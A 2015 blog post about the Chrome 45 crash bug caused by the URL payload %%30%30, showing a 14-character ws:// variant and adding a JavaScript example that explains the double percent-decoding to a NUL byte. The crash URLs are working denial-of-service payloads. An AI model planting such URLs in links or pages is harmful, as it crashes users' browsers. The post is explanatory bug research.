Wednesday, September 23, 2015

ChromeCrash: It is not 16 characters but 14!

Sixteen characters can crash the latest Chrome browser, and many articles have been written about this DoS vulnerability. Most of them state that the minimum required to crash is 16 characters, but my tests show that 14 characters can trigger the crash.
Those articles point to the URL below:
http://a/%%30%30

Tested with:
ws://a/%%30%30
The ws URI scheme stands for WebSocket. The payload (%%30%30) is unchanged; swapping the four-letter http scheme for the two-letter ws scheme is what brings the total from 16 characters down to 14.
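The reason the payload is %%30%30 rather than a plain %00 is double decoding: a lenient percent-decoder (one that keeps a malformed "%" literally instead of rejecting it) turns %%30%30 into %00 on the first pass, and a second pass on that string yields an actual NUL byte. The example below is added here to illustrate that behaviour; it is not code from the original post or from Chrome, and the decoder is a deliberately simple stand-in for a URL canonicalizer, not Chrome's implementation. It also checks the character counts for both URLs from the post.

```javascript
// Added example (not from the original post, not Chrome code).
// A lenient percent-decoder of the kind URL canonicalizers use:
// "%XX" with two hex digits is decoded, any other "%" is kept as-is.
function lenientPercentDecode(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const hex = s.substr(i + 1, 2);
    if (s[i] === '%' && /^[0-9A-Fa-f]{2}$/.test(hex)) {
      out += String.fromCharCode(parseInt(hex, 16));
      i += 2;               // skip the two hex digits we just consumed
    } else {
      out += s[i];          // malformed escape (e.g. "%%3"): keep the '%'
    }
  }
  return out;
}

// A strict decoder (decodeURIComponent) refuses the same input outright,
// which is why the payload only matters to lenient, multi-pass decoders.
function strictDecodeThrows(s) {
  try {
    decodeURIComponent(s);
    return false;
  } catch (e) {
    return e instanceof URIError;
  }
}

// Decode the payload twice and report whether a NUL byte appeared.
function payloadDecodes(path) {
  const once = lenientPercentDecode(path);   // "%%30%30" -> "%00"
  const twice = lenientPercentDecode(once);  // "%00"     -> "\u0000"
  return { once, twice, hasNul: twice.indexOf('\u0000') !== -1 };
}

// The two crash URLs from the post; only the scheme differs.
const PAYLOAD = '%%30%30';
const HTTP_URL = 'http://a/' + PAYLOAD;
const WS_URL = 'ws://a/' + PAYLOAD;

// Length of the crash URL for an arbitrary scheme name (illustrative helper).
function crashUrlLength(scheme) {
  return (scheme + '://a/' + PAYLOAD).length;
}

// Stand-alone run: prints the decoding chain and the two lengths.
console.log(payloadDecodes(PAYLOAD));            // once: "%00", twice: "\u0000"
console.log(HTTP_URL.length, WS_URL.length);     // 16 14
console.log('strict decode throws:', strictDecodeThrows(PAYLOAD));
```

Note that the first decoding pass alone is harmless (it yields the literal text %00); the NUL only exists after a second pass, so the bug class here is "decode-then-decode-again" rather than a malformed URL per se.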

One of the earliest Chrome crash bugs needed only one character (%) to crash the browser; it was found by my friend Rishi Narang.

Tested on:
Google Chrome 45.0.2454.99 (Official Build) m (32-bit)
Revision: 8813113675a50e4f7e90fec49a3eb1796454618b-refs/branch-heads/2454@{#492}
OS: Windows
The list of IANA-registered URI schemes can be found at:
http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml